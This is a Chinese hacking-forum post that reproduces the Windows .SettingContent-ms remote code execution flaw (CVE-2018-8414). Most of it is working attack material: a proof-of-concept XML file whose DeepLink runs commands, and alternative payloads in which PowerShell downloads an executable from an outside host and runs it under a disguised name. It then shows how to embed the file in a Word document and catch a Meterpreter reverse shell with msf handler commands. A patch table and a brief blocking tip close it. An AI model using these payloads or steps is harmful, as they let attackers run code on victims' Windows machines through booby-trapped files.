標題:Windows Shell遠程執行代碼漏洞((CVE-2018-8414)復現

taibeihacker

Moderator

0x00 SettingContent-ms文件介绍​

.SettingContent-ms是在Windows 10中引入的一種文件類型,它的內容是XML格式進行編寫的,主要用於創建Windows設置頁面的快捷方式.Windows 10下行.SettingContent-ms後綴的文件,系統並未判斷該類文件所在的路徑是否在控制面板相關目錄下,便直接執行了文件中用於控制面板設置相關的深層鏈接標籤指定的任意程序,導致用戶執行系統任意目錄下的此類文件或者從網絡上下載的經過精心設計的.SettingContent-ms文件也會直接執行其中指定的惡意程序對象,導致任意代碼執行.
文件包含一個DeepLink標記,它帶有帶參數的任何二進製文件並執行它。這可能會導致問題,因為攻擊者可以使用指向二進製文件(如cmd.exe或PowerShell.exe)的DeepLink元素創建.SettingContent-ms文件,該文件為其提供shell命令執行。

0x01 Windows Defender AV ASR Rules​

Windows Defender AV ASR Rules主要是為了解決防止漏洞利用惡意軟件感染計算機和應用程序,它是在Windows 10, version 1709 and later和Windows Server 2016中引入的,所有說之前的Windows Defender版本是沒有ASR Rules的。
從以下版本開始:Windows 10版本1703到1803 和Windows Server版本1709到1803如下圖顯示是Windows Defender AV ASR Rules自帶了AttackSurfaceReductionRules_Ids功能規則。
nrz4du0l2fm23440.jpg

gzp4auu3juv23441.jpg

而在低於該版本的10240中,Windows Defender AV ASR Rules是沒有帶AttackSurfaceReductionRules_Ids
zpxd5qeyf5l23442.jpg

注意:某些時候漏洞利用失敗取決於文件位置(默認策略設置),因此只需要將POC文件複製到如下目錄下就可以執行。 (如果改變默認路徑可以通過下載https://github.com/joesecurity/scmwrap/blob/master/scmwrap.exe通過管理員權限下去命令執行scmwrap.exe -install)
C:\Users\[USER]\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\[LANGUAGE]\

0x02 漏洞复现​

1.简单的测试弹出计算器​

1.將測試poc文件放入以下目錄位置:
C:\Users\admin(用戶)
\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\zh-CN\目錄下
0bptuqz3bdx23443.jpg

2. 點擊測試POC文件:
?xml version='1.0' encoding='UTF-8'?
PCSettings
SearchableContent xmlns='http://schemas.microsoft.com/Search/2013/SettingContent'
ApplicationInformation
AppIDwindows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel/AppID
DeepLink%windir%\system32\cmd.exe /c calc.exe/DeepLink
Icon%windir%\system32\control.exe/Icon
/ApplicationInformation
SettingIdentity
PageID/PageID
HostID{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}/HostID
/SettingIdentity
SettingInformation
[email protected],-4161/Description
[email protected],-4161/Keywords
/SettingInformation
/SearchableContent
/PCSettings
其他DeepLink…/DeepLink可替換POC:
1. %windir%\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' -k https://www.backlion.org/
2. %SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe -wind hidden -noni -nop -nologo -Comm '(New-Object System.Net.WebClient).DownloadFile('http://192.168.225.129/pwn.exe', $Env:AppData+'\svrcheck.exe'); Start-Process $Env:AppData'\svrcheck.exe'; Exit-PSSession;'
3. powershell-windowstyle hiddle (New-ObjectSystem.Net.WebClient)DownloadFile('https://www.xxx.com/test.exe',%APPDATA%\Rundll32.exe');Start-Process '%APPDATA%\Rundll32.exe'
4. wmic os get /format:'https://gist.githubusercontent.com/...a63504c9a0f41107137fbe861de487e4d4/minimalist'
3. 點擊test. settingcontent-MS,即可彈出calc
g0nhzrn4l3c23444.jpg

2.嵌入到office中弹出计算器​

1.創建一個word,這裡我就拿offcie 2007來當例子
2.點插入-對象-選擇由文件創建
屏幕快照 2018-08-30 下午11.39.43.png

4. 雙擊圖標後即可打開即可彈出計算器、
isct4vajbqk23446.jpg

3.kali下反弹shell​

利用腳本下載地址:
1.在KALI下執行腳本auto_settingcontent-ms.py,並填上監聽IP地址(KALI本機主機IP)和端口
root@kali2018:/opt# python auto_settingcontent-ms.py
0stem3nbnj423447.jpg

2.會在當前目錄下生成一個Test.SettingContent-ms以及將生成的LICENSE.txt自動拷貝到/var/www/html目錄下。
do1k3bvbufj23448.jpg

qackq4u3zae23449.jpg

5.開啟apache服務。
root@kali2018:/opt# service apache2 start
c30kz5o0thz23450.jpg

6.啟動msf,然後進行設置IP地址和監聽端口以及payload
msf use exploit/multi/handler
msf exploit(multi/handler) set payload windows/meterpreter/reverse_https
msf exploit(multi/handler) show options
msf exploit(multi/handler) set lhost 10.250.117.10
msf exploit(multi/handler) set lport 5555
msf exploit(multi/handler) exploit
xaareh4gfce23451.jpg

ahso2jbrt5223452.jpg

7.將生成的Test.SettingContent-ms拷貝出來,然後新建一個test.doc文檔,通過插入數據
q5d04o3zqrh23453.jpg
cccqntdowrg23454.jpg

unae0wtgxql23455.jpg

8.然後點擊保持test.docx,並打開該文檔點擊圖標即可反彈。
uwz0jcm1ytl23456.jpg

9.可以看到kali下反彈目標系統shell.
miwojrlvqi523457.jpg

31niswtezfk23458.jpg

0x03 漏洞影响版本​

適用於32位系統的Windows 10版本1703
4343885
安全更新
遠程執行代碼
重要
4338826
適用於基於x64的系統的Windows 10版本1703
4343885
安全更新
遠程執行代碼
重要
4338826
適用於32位系統的Windows 10版本1709
4343897
安全更新
遠程執行代碼
重要
4338825
適用於64位系統的Windows 10版本1709
4343897
安全更新
遠程執行代碼
重要
4338825
用於32位系統的Windows 10版本1803
4343909
安全更新
遠程執行代碼
重要
4338819
適用於基於x64的系統的Windows 10版本1803
4343909
安全更新
遠程執行代碼
重要
4338819
Windows Server,版本1709(服務器核心安裝)
4343897
安全更新
遠程執行代碼
重要
4338825
Windows Server,版本1803(服務器核心安裝)
4343909
安全更新
遠程執行代碼
重要
4338819

0x04 漏洞防御建议​

最好在防火牆和/或電子郵件網關阻止.SettingContent-ms文件通過執行。此外,可能還需要考慮使用組策略強制.SettingContent-ms禁止在記事本中打開(https://montour.co/2016/09/group-policy-force-js-files/)。

0x05 参考链接​

 
返回
上方